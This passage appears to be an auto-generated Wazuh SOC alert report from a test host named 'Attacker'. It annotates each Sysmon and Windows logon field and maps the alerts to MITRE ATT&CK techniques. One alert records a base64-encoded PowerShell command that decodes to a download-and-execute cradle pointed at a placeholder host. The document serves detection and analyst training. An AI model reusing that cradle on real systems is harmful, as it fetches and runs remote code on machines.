Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534232.1337837
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:09.2215671Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283487
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:09.193 ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} ProcessId: 11044 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vpgzfelx.hvu.ps1 CreationUtcTime: 2025-04-24 22:37:09.193 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:09.193
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd13-680a-340b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vpgzfelx.hvu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:09.193
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:14.605+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:14.605+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  47
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534234.1340606
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:12.5940581Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283514
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:10.461 ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} ProcessId: 13184 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} ParentProcessId: 11044 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:10.461
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd16-680a-360b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd13-680a-340b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:15.558+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:15.558+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  51
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534235.1348677
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:12.9778604Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283516
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:12.860 ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00} ProcessId: 13184 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yudgrlaq.1ii.ps1 CreationUtcTime: 2025-04-24 22:37:12.860 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:12.860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd16-680a-360b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yudgrlaq.1ii.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:12.860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:37:16.846+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:16.846+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  53
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534236.1351446
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:14.0705092Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43838
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:37:16.881+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:16.881+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  54
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534236.1358783
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:14.2143896Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43840
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

